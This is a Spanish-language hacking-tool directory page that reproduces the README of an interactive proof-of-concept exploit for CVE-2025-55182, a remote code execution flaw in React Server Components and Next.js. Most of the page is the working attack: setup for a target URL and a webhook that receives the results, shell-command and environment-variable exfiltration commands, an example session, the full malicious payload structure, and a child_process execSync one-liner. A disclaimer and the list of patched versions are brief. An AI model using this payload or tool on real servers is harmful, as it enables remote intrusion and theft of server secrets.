Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
react2shell-interactive — CVE-2025-55182 PoC Interactivo - React Server Components RCE - Investigación Educativa de Seguridad | Kitploit
Herramientas/GitHubGitHub/nathanj60/react2shell-interactive
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub
nathanj60/react2shell-interactive

react2shell-interactive

CVE-2025-55182 PoC Interactivo - React Server Components RCE - Investigación Educativa de Seguridad

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

React2Shell - PoC interactivo de CVE-2025-55182

Shell interactiva para explotar CVE-2025-55182, una vulnerabilidad de ejecución remota de código (RCE) en React Server Components.

Aviso legal

Esta herramienta se proporciona únicamente con fines EDUCATIVOS y de PRUEBAS DE SEGURIDAD AUTORIZADAS.

  • Úsala solo en sistemas que poseas o para los que tengas permiso explícito por escrito para realizar pruebas
  • El acceso no autorizado a sistemas informáticos es ilegal
  • El autor no se hace responsable del mal uso de esta herramienta
  • Esto es una prueba de concepto (PoC) para la investigación y concienciación en seguridad

Resumen de la vulnerabilidad

CVE-2025-55182 afecta a React Server Components (RSC) en:

  • Next.js < 15.1.7, < 14.2.29, < 13.5.9
  • Waku (varias versiones)

La vulnerabilidad permite la ejecución remota de código (RCE) mediante payloads maliciosos enviados a las Server Actions.

Cómo funciona

  1. El protocolo RSC utiliza la sintaxis $@x para referenciar objetos Chunk internos
  2. JavaScript desempaqueta automáticamente objetos con métodos .then() (similares a Promise)
  • Al crear un payload malicioso con propiedades controladas _response, _formData y _prefix
  • El atacante puede llegar al constructor Function mediante la travesía de la cadena de prototipos
  • Esto permite la ejecución arbitraria de JavaScript en el servidor
  • root@kitploit:~
    $3:constructor:constructor → Function constructor → RCE
    

    Instalación

    root@kitploit:~
    git clone https://github.com/NathanJ60/react2shell-interactive.git
    cd react2shell-interactive
    npm install
    

    Configuración

    Edita exploit.js y actualiza estos valores:

    root@kitploit:~
    const TARGET_URL = 'http://localhost:3000/'          // Vulnerable Next.js server
    const WEBHOOK_URL = 'https://webhook.site/YOUR-ID'   // Your webhook URL
    

    Obtén un webhook gratuito en: https://webhook.site

    Uso

    root@kitploit:~
    node exploit.js
    

    Comandos

    ComandoDescripción
    !testComprueba si el exploit funciona (envía confirmación al webhook)
    !envExfiltra las variables de entorno (process.env)
    !js <code>Ejecuta JavaScript personalizado
    !helpMuestra la ayuda
    !exitSalir
    <command>Ejecuta un comando del shell (p. ej., whoami, ls, cat /etc/passwd)

    Ejemplo de sesión

    root@kitploit:~
    react2shell> !test
    [+] Sent! Check webhook
    
    react2shell> whoami
    [+] Sent: whoami
    
    react2shell> ls -la
    [+] Sent: ls -la
    
    react2shell> !env
    [+] Sent! Check webhook for env vars
    

    Los resultados aparecen en tu webhook, no en la terminal.

    Detalles técnicos

    Estructura del payload

    root@kitploit:~
    {
        '0': '$1',
        '1': {
            'status': 'resolved_model',
            'reason': 0,
            '_response': '$4',
            'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
            'then': '$2:then'
        },
        '2': '$@3',
        '3': [],
        '4': {
            '_prefix': '<JAVASCRIPT_CODE>//',
            '_formData': { 'get': '$3:constructor:constructor' },
            '_chunks': '$2:_response:_chunks'
        }
    }
    

    Flujo de ejecución

    1. El payload se envía como datos de formulario multipart con la cabecera next-action
    2. El analizador React Flight procesa los chunks
    3. $@3 crea una referencia Chunk
    4. $3:constructor:constructor atraviesa hasta Function
    5. El contenido de _prefix se pasa a Function() y se ejecuta

    Notas para Next.js 15+

    • Usa módulos ESM, por lo que require() no está disponible
    • Usa import() dinámico en su lugar:
      root@kitploit:~
      import("child_process").then(cp => cp.execSync("whoami"))
      

    Versiones parcheadas

    Actualiza a estas versiones para corregir la vulnerabilidad:

    • Next.js >= 15.1.7
    • Next.js >= 14.2.29
    • Next.js >= 13.5.9

    Referencias

    • Sitio oficial de React2Shell
    • Plugin de Google Tsunami Scanner

    Licencia

    Licencia MIT - Solo con fines educativos.

    Autor

    PoC de investigación en seguridad - Úsala de forma responsable.

    Descargar herramienta